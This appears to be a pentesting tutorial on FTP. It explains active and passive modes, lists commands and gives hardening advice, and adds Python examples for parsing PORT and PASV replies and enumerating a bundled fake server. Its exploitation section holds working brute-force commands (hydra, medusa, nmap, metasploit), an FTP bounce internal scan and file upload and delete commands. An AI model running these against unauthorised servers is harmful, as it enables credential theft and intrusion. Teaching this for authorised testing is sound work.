Pentesting File Transfer Protocol (FTP)

FTP (File Transfer Protocol) is used to transfer files between computers. The service typically listens on TCP port 21 (plaintext) or TCP port 990 (implicit FTPS, that is FTP wrapped in TLS). The client and server establish a control channel on TCP port 21 and a separate data channel: in active mode the server opens the data connection from its TCP port 20, in passive mode it listens on an ephemeral port for the client to connect to. Depending on the mode and the server configuration you will therefore see only TCP port 21, or both TCP port 20 and TCP port 21, on the wire.

In a non-firewalled client environment communication can happen in active mode. The client connects from a random unprivileged port (N > 1024) to the FTP server's port 21. It then starts listening on a second port (M > 1024) and sends the FTP command PORT M to the server, encoded as h1,h2,h3,h4,p1,p2 where the port is (p1 x 256) + p2. The server then initiates the data connection back to the client's specified port M from its local data port 20. See FTP Active Connection Mode Communication traffic flow.

# on terminal one
sudo tcpdump -Uni $INTERFACE tcp port 21 or port 990    # unbuffered FTP capture filter

# on terminal two
ftp -n    # activate the ftp client utility inhibiting auto-login
ftp> open $IP    # connect to the FTP server
ftp> user $USERNAME $PASSWORD    # submit the username and password
ftp> ls    # list the contents of the working directory
ftp> quit    # quit the connection

/images/ftp/00_ftp-active-connection.png
FTP Active Connection Mode Communication

In a firewalled client environment passive mode is used. The client connects to the FTP server's port 21 from a random unprivileged port (N > 1024) and issues the FTP command PASV. The server then opens a random unprivileged port (P > 1024) and returns it to the client in a 227 reply ("Entering Passive Mode (h1,h2,h3,h4,p1,p2)", where P = (p1 x 256) + p2); there is no PORT command in this direction. The client then initiates the data connection from a port (M > 1024) to port P on the server to transfer data. See FTP Passive Connection Mode Communication traffic flow.

# on terminal one
sudo tcpdump -Uni $INTERFACE tcp port 21 or port 990    # unbuffered FTP capture filter

# on terminal two
ftp -np    # activate the ftp client in passive mode inhibiting auto-login
ftp> open $IP    # connect to the FTP server
ftp> user $USERNAME $PASSWORD    # submit the username and password
ftp> ls    # list the contents of the working directory
ftp> quit    # quit the connection

/images/ftp/00_ftp-passive-connection.png
FTP Passive Connection Mode Communication

It is important to note that the capture filter above matches only the control channel (ports 21 and 990). Data connections use the server's port 20 in active mode or an ephemeral server port in passive mode, so unless you add "or port 20" to the filter (active mode) or capture by host rather than by port (passive mode) you will only see the control traffic; which of the two the server uses depends on how it was configured.
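Both mode descriptions above come down to the same h1,h2,h3,h4,p1,p2 encoding, once carried in the client's PORT command and once in the server's 227 reply. The following Python is an added example, not code from the original page: it walks two constructed control-channel transcripts (sample data, not real captures) and reports the data connection each mode produces, and it flags a PORT or 227 address that differs from the peer you are actually talking to. On the PORT side that mismatch is the FTP bounce primitive (what nmap -b and ftp-bounce.nse test for); on the 227 side it is the usual symptom of a server behind NAT advertising its internal address.

```python
import re

# Constructed control-channel transcripts (sample data, not real captures).
# "C:" lines are client commands, "S:" lines are server replies.
ACTIVE_TRANSCRIPT = """\
S: 220 (vsFTPd 3.0.3)
C: USER anonymous
S: 331 Please specify the password.
C: PASS anonymous@
S: 230 Login successful.
C: PORT 10,0,0,5,195,89
S: 200 PORT command successful. Consider using PASV.
C: LIST
S: 150 Here comes the directory listing.
S: 226 Directory send OK.
C: QUIT
S: 221 Goodbye.
"""

PASSIVE_TRANSCRIPT = """\
S: 220 (vsFTPd 3.0.3)
C: USER anonymous
S: 331 Please specify the password.
C: PASS anonymous@
S: 230 Login successful.
C: PASV
S: 227 Entering Passive Mode (10,0,0,9,39,16).
C: LIST
S: 150 Here comes the directory listing.
S: 226 Directory send OK.
C: QUIT
S: 221 Goodbye.
"""

HOSTPORT_RE = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def encode_hostport(ip, port):
    """Build the h1,h2,h3,h4,p1,p2 argument a client sends with PORT (RFC 959)."""
    if not 0 <= port <= 65535:
        raise ValueError("port out of range: %d" % port)
    return "%s,%d,%d" % (ip.replace(".", ","), port // 256, port % 256)


def decode_hostport(text):
    """Parse h1,h2,h3,h4,p1,p2 out of a PORT argument or a 227 reply."""
    m = HOSTPORT_RE.search(text)
    if not m:
        raise ValueError("no host/port tuple in: %r" % text)
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    if max(h1, h2, h3, h4, p1, p2) > 255:
        raise ValueError("octet out of range in: %r" % text)
    return "%d.%d.%d.%d" % (h1, h2, h3, h4), p1 * 256 + p2


def data_channels(transcript, client_ip, server_ip):
    """Report every data connection a control-channel transcript would produce:
    who initiates it, from where, to where, and whether the advertised address
    differs from the peer the control channel is actually talking to."""
    channels = []
    for line in transcript.splitlines():
        who, _, payload = line.partition(": ")
        if who == "C" and payload.upper().startswith("PORT "):
            ip, port = decode_hostport(payload)
            channels.append({
                "mode": "active", "initiator": "server",
                "src": (server_ip, 20), "dst": (ip, port),
                # PORT pointing at a host other than the client itself is the bounce primitive
                "third_party": ip != client_ip,
            })
        elif who == "S" and payload.startswith("227"):
            ip, port = decode_hostport(payload)
            channels.append({
                "mode": "passive", "initiator": "client",
                "src": (client_ip, None), "dst": (ip, port),   # client port M > 1024 is chosen at connect time
                # a 227 host that is not the control peer usually means NAT; modern clients ignore it
                "third_party": ip != server_ip,
            })
    return channels


if __name__ == "__main__":
    for name, t in (("active", ACTIVE_TRANSCRIPT), ("passive", PASSIVE_TRANSCRIPT)):
        for ch in data_channels(t, "10.0.0.5", "10.0.0.9"):
            print(name, ch)
```

Feed the function the relevant lines of a real capture (tcpdump -A on port 21 shows them in the clear) to confirm which endpoints the data channel will use before widening the capture filter.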

Common FTP Server Applications

  • Unix systems
    • vsftpd (Very Secure FTP Daemon)
    • ProFTPD
    • Pure-FTPd
  • Windows systems
    • Core FTP Server
    • IIS (Internet Information Services)
    • FileZilla Server

Common FTP Commands

COMMAND      USAGE                                          DESCRIPTION
ABOR         ABOR                                           abort a file transfer
CWD          CWD $FOLDERNAME                                change working directory
DELE         DELE $FILENAME                                 delete a remote file
HELP         HELP $COMMAND                                  show supported commands, or details of one command
LIST         LIST $FOLDERNAME                               list a remote directory
MKD          MKD $FOLDERNAME                                make a remote directory
PASS         PASS $PASSWORD                                 send password
PASV         PASV                                           enter passive mode (server answers 227 with its data address and port)
PORT         PORT a1,a2,a3,a4,p1,p2                         open a data port at address a1.a2.a3.a4, port ((p1 x 256) + p2)
PWD          PWD                                            print working directory
QUIT         QUIT                                           terminate the connection
RETR         RETR $FILENAME                                 retrieve a remote file
RMD          RMD $FOLDERNAME                                remove a remote directory
RNFR/RNTO    RNFR $OLD_FILENAME, then RNTO $NEW_FILENAME    rename a file
STOR         STOR $FILENAME                                 store a file on the remote host
TYPE         TYPE $DATATYPE                                 set transfer type (A for ASCII, I for binary)
USER         USER $USERNAME                                 send username

Common Vulnerability

Known Attack Vectors

Security Best Practices

  • Use FTPS (FTP over TLS) instead of plaintext FTP, or preferably replace FTP with SFTP, which is a separate protocol carried over SSH.
  • Enable authentication with a strong password policy, and disable anonymous login unless it is explicitly required.
  • Enable a file access control policy (confine users to their own directories and restrict write access).
  • Suppress the application name and version in the service banner so the server cannot be fingerprinted.
  • Configure a CIDR/IP range whitelist if necessary.

Exploitation
Almost all FTP implementations offer no way to execute a shell command directly, but they are great for information disclosure, file upload and exfiltration. When an FTP service is encountered an attacker will typically look at:

  • What valuable information they can find including hidden contents.
  • Whether they can perform path traversal to reach other valuable contents.
  • Whether they can upload a malicious file and execute it through another service.
'WORDLISTS
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt
'
## SERVICE ENUMERATION ##
# with nmap
ls /usr/share/nmap/scripts/ftp*    # list nmap ftp scripts
'SNIP
/usr/share/nmap/scripts/ftp-anon.nse
/usr/share/nmap/scripts/ftp-bounce.nse
/usr/share/nmap/scripts/ftp-brute.nse
/usr/share/nmap/scripts/ftp-libopie.nse
/usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-syst.nse
/usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
'
nmap -p 21 -sV $IP   # show version
nmap -p 21 --script ftp-anon $IP    # identify anonymous login
nmap --script ftp-bounce -Pn -b $USERNAME:$PASSWORD@$IP:$PORT -p$TARGETPORTS $TARGETIP -oN nmap_internal_scan    # initiate internal scan

# with telnet 
telnet $IP $PORT     # show banner

# with nc
nc -n $IP 21    # show banner

# with openssl
openssl s_client -connect $IP:21 -starttls ftp    # show banner and certificate

# with metasploit
search scanner/ftp
use auxiliary/scanner/ftp/ftp_version    # show version
show options
setg rhosts $IP
run

use auxiliary/scanner/ftp/anonymous    # identify anonymous login
show options
run

## CREDENTIAL ENUMERATION ##
# with nmap
nmap --script ftp-brute -p 21 $IP --script-args brute.mode=creds,brute.credfile=$USERNAMEPASSWORDLIST --min-rate 10000  # reveal credentials - wordlist entries must be in the form USERNAME/PASSWORD

# with hydra
hydra -t 20 -c 1 -L $USERNAMELIST -P $PASSWORDLIST -s 21 ftp://$IP -V    # reveal credentials

# with medusa
medusa -t 2 -T 2 -U $USERNAMELIST -P $PASSWORDLIST -h $IP -n 21 -M ftp | grep "SUCCESS"

# with metasploit
use auxiliary/scanner/ftp/ftp_login
show options
set threads 30
set rhosts $IP
set userpass_file $USERNAMEPASSWORDLIST    # wordlist in the form USERNAME PASSWORD
run

## PATH ENUMERATION ##
# with curl
curl -s ftp://$USERNAME:$PASSWORD@$IP    # login and list home folder contents
curl -s --user "$USERNAME:$PASSWORD" ftp://$IP:$PORT/ --upload-file $LOCAL_FILENAME     # upload file
curl -s ftp://$USERNAME:$PASSWORD@$IP/ --quote "DELE $REMOTE_FILENAME"    # delete specified file using ftp command

# with wget
wget -r -m --no-passive-ftp -nH -P $FOLDERNAME ftp://$USERNAME:$PASSWORD@$IP:$PORT/    # download recursively (drop --no-passive-ftp to use passive mode)

## HOST ENUMERATION/FOOTPRINTING ##
# with ftp
ftp -n <<RUN
open $IP
user $USERNAME $PASSWORD
put $LOCAL_FILENAME
RUN

# with lftp
lftp -u "$USERNAME,$PASSWORD" -p 21 $IP -c 'ls -a'    # login and list all contents (double quotes so the shell expands the variables)
lftp    # activate the prompt
?    # show help
set ftp:ssl-force yes    # enable ssl
set ssl:verify-certificate no    # do not verify certificate
connect $IP    # connect to the server
login $USERNAME $PASSWORD    # login
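The service-enumeration steps above (banner grab, anonymous login check, SYST fingerprint, directory listing) as one script, written here as an added example rather than code from the original page. Because it must run offline it carries its own constructed fake FTP server (the banner, listing and "only anonymous logs in" rule are made up for the example); point enumerate_ftp at a real host and port and the fake server is not involved.

```python
import socket
import threading
from ftplib import FTP, all_errors

# --- constructed fake FTP server, only so the example runs offline ---
FAKE_BANNER = "220 (vsFTPd 3.0.3)"          # constructed vsftpd-style banner (leaks the version)
FAKE_LISTING = [                            # constructed directory listing
    "drwxr-xr-x    2 0        0            4096 Jan 01 00:00 pub",
    "-rw-r--r--    1 0        0              42 Jan 01 00:00 README",
]


def _send(conn, line):
    conn.sendall((line + "\r\n").encode())


def _serve_client(conn, server_ip):
    """Speak just enough RFC 959 to answer the enumeration below."""
    _send(conn, FAKE_BANNER)
    buf, user, logged_in, data_sock = b"", None, False, None
    while True:
        while b"\r\n" not in buf:
            chunk = conn.recv(1024)
            if not chunk:
                conn.close()
                return
            buf += chunk
        line, buf = buf.split(b"\r\n", 1)
        cmd, _, arg = line.decode(errors="replace").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            _send(conn, "331 Please specify the password.")
        elif cmd == "PASS":
            logged_in = user in ("anonymous", "ftp")       # only anonymous accounts exist here
            _send(conn, "230 Login successful." if logged_in else "530 Login incorrect.")
        elif cmd == "SYST":
            _send(conn, "215 UNIX Type: L8")
        elif cmd == "TYPE":
            _send(conn, "200 Switching to ASCII mode.")
        elif cmd == "PASV":                                  # open an ephemeral data port, advertise it in 227
            data_sock = socket.socket()
            data_sock.bind((server_ip, 0))
            data_sock.listen(1)
            p = data_sock.getsockname()[1]
            _send(conn, "227 Entering Passive Mode (%s,%d,%d)."
                  % (server_ip.replace(".", ","), p // 256, p % 256))
        elif cmd == "LIST":
            if not logged_in:
                _send(conn, "530 Please login with USER and PASS.")
            elif data_sock is None:
                _send(conn, "425 Use PORT or PASV first.")
            else:
                _send(conn, "150 Here comes the directory listing.")
                d, _ = data_sock.accept()
                d.sendall("".join(l + "\r\n" for l in FAKE_LISTING).encode())
                d.close()
                data_sock.close()
                data_sock = None
                _send(conn, "226 Directory send OK.")
        elif cmd == "QUIT":
            _send(conn, "221 Goodbye.")
            conn.close()
            return
        else:
            _send(conn, "500 Unknown command.")


def start_fake_server(ip="127.0.0.1"):
    """Start the fake server on an ephemeral port in a daemon thread; returns the port."""
    srv = socket.socket()
    srv.bind((ip, 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_client, args=(conn, ip), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


# --- the enumeration: what ftp_version, ftp-anon and ftp-syst do, with ftplib ---
def enumerate_ftp(host, port=21, user="anonymous", passwd="anonymous@", timeout=5):
    """Grab the banner, attempt a login, and on success fingerprint with SYST and list the root."""
    result = {"banner": None, "login_ok": False, "syst": None, "listing": [], "error": None}
    ftp = FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
        result["banner"] = ftp.getwelcome()                  # 220 line, often includes the version
        ftp.login(user, passwd)                              # USER/PASS; raises error_perm on 530
        result["login_ok"] = True
        result["syst"] = ftp.sendcmd("SYST")                 # OS fingerprint
        ftp.retrlines("LIST", result["listing"].append)      # PASV data channel, then LIST
    except all_errors as e:
        result["error"] = str(e)
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()
    return result


if __name__ == "__main__":
    port = start_fake_server()
    print(enumerate_ftp("127.0.0.1", port))                    # anonymous login succeeds
    print(enumerate_ftp("127.0.0.1", port, "bob", "hunter2"))  # 530, no listing
```

The reply code is what matters: a 230 after PASS means anonymous access, a 530 means the account or password is wrong, and the 220 banner and 215 SYST reply are the fingerprints the hardening advice above says to suppress.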

References